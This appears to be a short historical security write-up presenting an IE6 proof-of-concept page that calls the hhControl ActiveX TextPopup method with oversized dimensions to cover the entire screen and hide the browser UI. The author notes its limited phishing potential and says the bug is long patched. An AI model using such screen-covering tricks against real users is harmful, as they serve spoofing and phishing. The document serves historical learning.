The HTML Help control (hhControl) has a TextPopup method that displays a text popup over a specified screen area. By passing very large coordinates, a page can create a popup that covers the entire screen — a crude but effective method to overlay the browser UI with controlled content.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Another (useless) Method to cover the screen </title>
</head>
<body>
<font face="Tahoma" size="2">
Another (but this time, lame) method to cover the full screen using the TextPopup from the hhControl. <br />
It works only in IE6. Go ahead... <input type="button" value="Click here" onclick="showTextPop();">
</font>
<object id="hhControl" style="display:none;" type="application/x-oleobject" classid="clsid:41B23C28-488E-4E5C-ACE2-BB0BBABE99E8"></object>
<script language="JavaScript">
function showTextPop()
{
hhControl.TextPopup("","",5000,5000,0,111111255);
}
</script>
</body>
</html>TextPopup accepts width and height parameters and doesn’t clamp them to the screen dimensions. Passing 5000×5000 pixels creates a white rectangle covering everything. The last parameter is a color value — passing 111111255 produces a distinctive tint. The popup itself doesn’t accept interactive HTML input, limiting its phishing potential, but it does completely obscure the browser.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.